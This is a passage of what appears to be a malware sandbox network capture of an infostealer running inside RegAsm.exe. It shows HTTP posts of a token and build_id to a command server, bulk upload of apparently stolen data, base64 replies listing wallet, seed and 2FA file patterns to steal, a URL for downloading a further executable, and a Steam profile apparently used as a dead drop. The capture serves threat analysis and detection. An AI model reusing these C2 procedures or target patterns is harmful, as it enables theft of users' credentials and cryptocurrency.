61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------DHJJEGHIIDAFIDHJDHJECont
2024-09-21 12:49:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:20 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.9	49773	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:22 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:22 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------CBFIJEGIDBGIECAKKEGDCont
2024-09-21 12:49:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:23 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.9	49774	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:25 UTC	283	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 130901 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:25 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------BGHJJDGHCBGDHIECBGIDContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------BGHJJDGHCBGDHIECBGIDCont
2024-09-21 12:49:25 UTC	16355	OUT	Data Raw: 56 50 63 48 33 46 66 50 53 70 78 69 6d 2b 56 32 76 61 39 2f 38 41 67 48 31 73 61 6b 70 57 58 4d 72 32 76 61 33 2f 41 41 54 49 62 55 72 65 38 76 72 69 33 73 62 72 53 72 77 58 4c 5a 45 66 32 31 64 7a 59 51 41 6a 61 41 63 2f 64 4a 72 7a 6e 78 42 59 66 32 62 72 4d 31 74 35 61 78 37 63 4e 73 56 39 77 47 52 6e 67 34 48 72 36 56 36 74 71 68 42 76 39 45 49 4f 51 62 78 73 66 2b 41 38 31 65 63 65 4f 50 38 41 6b 62 4c 76 2f 64 6a 2f 41 50 51 42 58 66 6c 62 35 63 51 75 58 5a 70 6e 6b 35 30 75 62 43 74 79 33 54 52 7a 6c 48 46 4c 53 63 56 39 4c 63 2b 51 43 69 69 69 67 43 2f 34 58 31 33 54 64 4e 38 53 57 6c 33 64 33 50 6c 77 52 37 39 7a 62 47 62 47 55 59 44 67 44 50 55 69 76 53 50 2b 46 6a 65 45 2f 77 44 6f 4b 2f 38 41 6b 76 4c 2f 41 50 45 31 34 64 70 69 32 4c 36 6e 62 Data Ascii: VPcH3FfPSpxim+V2va9/8AgH1sakpWXMr2va3/AATIbUre8vri3sbrSrwXLZEf21dzYQAjaAc/dJrznxBYf2brM1t5ax7cNsV9wGRng4Hr6V6tqhBv9EIOQbxsf+A81eceOP8AkbLv/dj/APQBXflb5cQuXZpnk50ubCty3TRzlHFLScV9Lc+QCiiigC/4X13TdN8SWl3d3PlwR79zbGbGUYDgDPUivSP+FjeE/wDoK/8AkvL/APE14dpi2L6nb
2024-09-21 12:49:25 UTC	16355	OUT	Data Raw: 6c 46 4d 56 6b 50 2f 41 48 62 64 56 78 37 69 6d 2b 53 44 39 31 2f 77 4e 4a 52 52 5a 44 31 47 4e 45 36 39 52 54 4b 73 42 79 4f 39 4b 58 44 66 65 55 47 6c 59 66 4d 79 74 52 55 35 6a 6a 62 6f 53 50 72 54 47 67 66 2b 48 35 68 37 55 72 46 4b 53 49 7a 53 48 70 53 6b 45 64 52 69 6a 6d 67 61 47 30 55 74 49 61 42 69 55 55 74 46 4d 59 6c 4a 53 30 55 42 63 53 6b 70 61 4b 42 6a 65 61 58 6d 69 67 30 44 45 4e 4a 53 30 6c 41 30 47 4b 53 6c 6f 4e 4d 42 43 4b 62 54 71 4d 55 44 47 69 67 30 76 46 4a 51 4d 51 30 6e 61 6e 55 6d 4b 51 78 75 4b 54 38 4b 63 52 53 64 36 64 68 69 45 63 55 6e 2b 65 6c 4c 69 6c 4e 46 68 6f 59 52 69 6b 70 39 4e 6f 47 49 65 61 44 53 30 6d 4f 39 49 59 30 6a 38 61 51 30 38 34 36 64 36 53 6b 4d 5a 6a 6d 6a 74 2b 4e 4f 78 78 54 63 63 2b 6d 4b 64 68 69 48 Data Ascii: lFMVkP/AHbdVx7im+SD91/wNJRRZD1GNE69RTKsByO9KXDfeUGlYfMytRU5jjboSPrTGgf+H5h7UrFKSIzSHpSkEdRijmgaG0UtIaBiUUtFMYlJS0UBcSkpaKBjeaXmig0DENJS0lA0GKSloNMBCKbTqMUDGig0vFJQMQ0nanUmKQxuKT8KcRSd6dhiEcUn+elLilNFhoYRikp9NoGIeaDS0mO9IY0j8aQ0846d6SkMZjmjt+NOxxTcc+mKdhiH
2024-09-21 12:49:25 UTC	16355	OUT	Data Raw: 6f 70 4b 41 43 69 69 69 6d 4d 4d 30 74 4a 52 51 49 57 69 6a 4e 46 41 42 30 6f 6f 6f 7a 54 47 42 6f 6f 70 44 51 41 74 46 4a 53 30 41 46 46 46 47 61 41 46 48 4e 46 49 4b 58 4e 41 42 51 61 4b 4b 51 42 52 53 55 74 41 68 61 54 46 48 30 70 54 53 41 54 42 70 63 63 55 55 55 77 41 44 32 6f 78 52 52 53 41 54 47 61 4e 75 4b 64 53 30 58 59 44 63 55 68 48 53 6e 59 34 6f 41 7a 78 53 75 46 78 6d 50 51 30 68 54 49 36 66 6a 56 68 4c 65 5a 2f 75 77 79 48 36 4b 61 73 70 70 46 34 34 2f 77 42 54 74 2f 33 6d 41 71 58 56 69 74 32 48 4e 59 79 7a 46 36 47 6f 7a 45 66 53 74 34 61 4a 4d 42 2b 38 75 49 55 2b 72 55 38 61 52 61 70 2f 72 4c 77 6e 2f 63 57 6c 39 61 67 75 6f 2f 61 32 4f 61 61 4d 6d 6d 46 53 50 70 58 57 72 70 32 6c 71 66 6d 45 30 6e 34 34 71 33 62 32 47 6d 7a 52 58 4b 4a Data Ascii: opKACiiimMM0tJRQIWijNFAB0ooozTGBoopDQAtFJS0AFFFGaAFHNFIKXNABQaKKQBRSUtAhaTFH0pTSATBpccUUUwAD2oxRRSATGaNuKdS0XYDcUhHSnY4oAzxSuFxmPQ0hTI6fjVhLeZ/uwyH6KasppF44/wBTt/3mAqXVit2HNYyzF6GozEfSt4aJMB+8uIU+rU8aRap/rLwn/cWl9aguo/a2OaaMmmFSPpXWrp2lqfmE0n44q3b2GmzRXKJ
2024-09-21 12:49:25 UTC	16355	OUT	Data Raw: 30 68 70 44 51 68 70 50 72 53 6b 48 50 72 36 55 6e 53 6b 55 4a 6a 31 36 55 64 71 50 77 6f 50 51 30 44 52 36 42 52 52 69 69 73 44 35 4d 55 41 73 51 41 43 53 65 41 42 58 53 36 52 70 4e 38 6a 32 30 72 77 46 56 57 51 4d 63 39 63 5a 7a 55 6e 67 76 53 6f 37 79 36 65 35 6c 55 4d 49 6a 68 51 66 58 31 72 76 54 4d 71 4d 59 34 59 46 64 56 4f 33 4a 63 4b 57 49 36 68 52 33 78 2b 46 66 50 5a 74 69 6c 4a 2b 78 58 51 2b 77 34 66 77 44 70 78 2b 74 53 66 78 4b 79 58 6c 66 2f 67 46 74 4a 6b 6c 47 35 58 44 4c 37 47 6f 37 35 2f 38 41 51 4c 6a 2f 41 4b 35 4e 2f 4b 71 6b 68 52 46 53 37 67 79 46 59 44 49 78 6a 49 39 2f 65 71 2b 6f 33 71 72 70 74 30 63 39 49 58 50 36 47 76 46 50 70 54 7a 43 36 65 37 65 7a 67 2b 32 65 5a 35 6f 6b 6c 78 35 69 62 54 74 33 66 4c 32 48 47 4d 59 50 65 Data Ascii: 0hpDQhpPrSkHPr6UnSkUJj16UdqPwoPQ0DR6BRRiisD5MUAsQACSeABXS6RpN8j20rwFVWQMc9cZzUngvSo7y6e5lUMIjhQfX1rvTMqMY4YFdVO3JcKWI6hR3x+FfPZtilJ+xXQ+w4fwDpx+tSfxKyXlf/gFtJklG5XDL7Go75/8AQLj/AK5N/KqkhRFS7gyFYDIxjI9/eq+o3qrpt0c9IXP6GvFPpTzC6e7ezg+2eZ5oklx5ibTt3fL2HGMYPe
2024-09-21 12:49:25 UTC	16355	OUT	Data Raw: 55 5a 57 33 2f 72 38 62 6f 50 37 43 78 53 63 6f 58 30 56 76 6e 2f 41 4d 4e 5a 2f 63 53 30 56 6d 77 61 72 4a 4a 4e 71 63 72 61 6c 34 66 62 79 4c 43 57 53 4b 34 46 67 52 44 43 33 6e 52 71 4e 36 47 41 45 6e 42 49 7a 74 62 72 54 30 76 78 4a 72 56 39 44 49 6b 63 48 6b 42 49 33 43 68 56 52 35 41 67 44 75 67 48 41 52 6a 6c 6c 78 32 49 36 64 4b 75 68 6d 4d 4b 31 52 51 74 61 36 75 5a 59 76 4a 71 6d 48 70 53 71 75 56 37 4f 78 66 6f 70 71 79 49 2f 77 42 78 31 62 36 48 4e 52 76 4d 49 72 32 49 4d 69 4f 68 67 75 57 49 63 5a 47 56 67 64 6c 2f 55 43 75 79 74 56 56 4b 6e 4b 6f 39 6b 72 6e 6d 34 65 68 4b 76 57 6a 53 57 6a 62 73 54 55 56 68 36 58 71 48 6e 36 56 70 73 73 73 53 79 75 31 78 65 79 47 4d 48 44 54 69 47 33 57 52 59 38 39 63 46 75 4f 50 55 34 35 71 58 54 64 56 75 Data Ascii: UZW3/r8boP7CxScoX0Vvn/AMNZ/cS0VmwarJJNqcral4fbyLCWSK4FgRDC3nRqN6GAEnBIztbrT0vxJrV9DIkcHkBI3ChVR5AgDugHARjllx2I6dKuhmMK1RQta6uZYvJqmHpSquV7OxfopqyI/wBx1b6HNRvMIr2IMiOhguWIcZGVgdl/UCuytVVKnKo9krnm4ehKvWjSWjbsTUVh6XqHn6VpsssSyu1xeyGMHDTiG3WRY89cFuOPU45qXTdVu
2024-09-21 12:49:25 UTC	16355	OUT	Data Raw: 44 7a 51 61 58 6f 4b 51 78 4b 51 6d 6c 39 36 54 4e 42 53 44 31 70 4d 35 70 61 51 38 30 41 48 53 6b 4f 50 54 76 53 30 68 50 36 55 44 45 7a 51 52 52 53 5a 70 6a 51 5a 70 41 4b 58 39 4b 53 6b 4d 42 6a 48 74 53 5a 70 54 30 70 4d 30 44 41 63 44 32 70 50 65 6c 35 70 4d 2f 35 4e 4d 41 36 2f 54 33 70 44 6e 48 53 6c 50 58 72 53 45 30 68 69 66 57 69 6c 36 30 6e 58 74 54 47 49 65 74 48 54 70 78 39 4b 58 36 55 6e 66 2f 43 67 5a 36 4a 52 52 52 57 5a 38 69 46 46 61 4f 6a 61 53 32 73 58 63 6c 75 73 6f 6a 4b 52 6d 54 4a 58 4f 63 45 44 48 58 33 72 55 2f 34 52 49 68 69 72 58 68 42 48 55 47 4c 2f 41 4f 76 58 6d 34 72 4e 73 48 68 4a 2b 7a 72 54 73 2f 52 76 38 6b 65 6c 68 63 6f 78 75 4c 70 2b 30 6f 77 75 76 56 4c 38 32 63 31 52 58 55 44 77 66 6e 2f 6c 2f 77 44 2f 41 43 44 2f Data Ascii: DzQaXoKQxKQml96TNBSD1pM5paQ80AHSkOPTvS0hP6UDEzQRRSZpjQZpAKX9KSkMBjHtSZpT0pM0DAcD2pPel5pM/5NMA6/T3pDnHSlPXrSE0hifWil60nXtTGIetHTpx9KX6Unf/CgZ6JRRRWZ8iFFaOjaS2sXclusojKRmTJXOcEDHX3rU/4RIhirXhBHUGL/AOvXm4rNsHhJ+zrTs/Rv8kelhcoxuLp+0owuvVL82c1RXUDwfn/l/wD/ACD/
2024-09-21 12:49:25 UTC	16355	OUT	Data Raw: 55 65 30 68 33 51 65 78 71 2f 79 76 37 68 31 46 50 6a 68 6e 6d 73 2f 74 6b 56 72 63 76 61 38 2f 76 31 67 63 78 38 48 42 2b 62 47 4f 76 46 4d 37 55 34 79 6a 4c 5a 6b 79 70 7a 68 38 53 73 4c 52 54 53 64 71 65 59 77 49 6a 33 62 4e 2b 44 74 33 59 7a 6a 50 54 4f 4f 31 54 6d 30 76 42 41 6b 2f 32 47 37 38 6c 77 43 73 76 32 64 39 72 41 39 4d 48 47 44 53 64 53 4b 33 59 34 30 71 6b 76 68 69 33 38 6a 75 37 48 78 76 70 64 74 70 39 74 62 76 46 64 6c 34 6f 55 52 69 71 4c 6a 49 41 48 48 7a 56 50 38 41 38 4a 39 70 50 2f 50 47 39 2f 37 39 72 2f 38 41 46 56 35 70 35 71 65 57 73 6d 54 35 62 4e 74 56 39 70 77 57 34 34 7a 36 38 6a 6a 33 70 35 79 6f 6c 4a 56 78 35 4a 32 79 35 55 2f 75 7a 6e 47 47 39 4f 65 4f 61 38 76 2b 79 73 4e 2f 4d 2f 76 58 2b 52 37 2f 41 50 62 2b 4e 2f 6b Data Ascii: Ue0h3Qexq/yv7h1FPjhnms/tkVrcva8/v1gcx8HB+bGOvFM7U4yjLZkypzh8SsLRTSdqeYwIj3bN+Dt3YzjPTOO1Tm0vBAk/2G78lwCsv2d9rA9MHGDSdSK3Y40qkvhi38ju7Hxvpdtp9tbvFdl4oURiqLjIAHHzVP8A8J9pP/PG9/79r/8AFV5p5qeWsmT5bNtV9pwW44z68jj3p5yolJVx5J2y5U/uznGG9OeOa8v+ysN/M/vX+R7/APb+N/k
2024-09-21 12:49:25 UTC	61	OUT	Data Raw: 2f 41 45 47 4f 71 64 58 4a 50 2b 51 4c 61 2f 38 41 58 78 4e 2f 36 44 48 51 42 2f 2f 5a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 2d 2d 0d 0a Data Ascii: /AEGOqdXJP+QLa/8AXxN/6DHQB//Z------BGHJJDGHCBGDHIECBGID--
2024-09-21 12:49:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:26 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.9	49775	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:28 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAEHIEBGHDAFIEBGIEHJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:28 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 Data Ascii: ------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------BAEHIEBGHDAFIEBGIEHJCont
2024-09-21 12:49:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:28 UTC	103	IN	Data Raw: 35 63 0d 0a 4d 54 45 34 4d 44 59 78 4e 6e 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 57 4e 69 4e 44 55 30 5a 44 4a 69 4e 47 46 66 62 47 64 6d 5a 48 4e 71 5a 32 52 7a 4c 6d 56 34 5a 58 77 78 66 47 74 72 61 32 74 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 5cMTE4MDYxNnxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZWNiNDU0ZDJiNGFfbGdmZHNqZ2RzLmV4ZXwxfGtra2t80

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.9	49777	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:33 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:33 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 45 48 43 42 41 4b 46 43 41 4b 46 48 43 47 44 47 0d 0a 43 6f 6e 74 Data Ascii: ------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------BFIJEHCBAKFCAKFHCGDGContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------BFIJEHCBAKFCAKFHCGDGCont
2024-09-21 12:49:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:34 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.9	49780	116.203.165.127	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:36 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBAKEHIEBKJJJJJKKKE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:36 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 64 38 65 66 31 64 38 39 33 33 66 32 35 34 37 34 63 62 36 31 35 64 31 63 65 30 32 36 61 34 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 33 61 31 35 32 33 37 61 61 39 32 64 63 64 38 63 63 63 61 34 34 37 32 31 31 66 62 35 66 63 32 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 41 4b 45 48 49 45 42 4b 4a 4a 4a 4a 4a 4b 4b 4b 45 0d 0a 43 6f 6e 74 Data Ascii: ------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="token"b7d8ef1d8933f25474cb615d1ce026a4------CFBAKEHIEBKJJJJJKKKEContent-Disposition: form-data; name="build_id"3a15237aa92dcd8ccca447211fb5fc2a------CFBAKEHIEBKJJJJJKKKECont
2024-09-21 12:49:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 12:49:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 12:49:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.9	49786	45.132.206.251	443	7436	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:41 UTC	188	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Connection: Keep-Alive Cache-Control: no-cache Host: cowod.hopto.org
2024-09-21 12:49:41 UTC	183	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 21 Sep 2024 12:49:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: cowod.hopto.org

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.9	49789	23.197.127.21	443	1136	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:49:43 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 12:49:44 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net 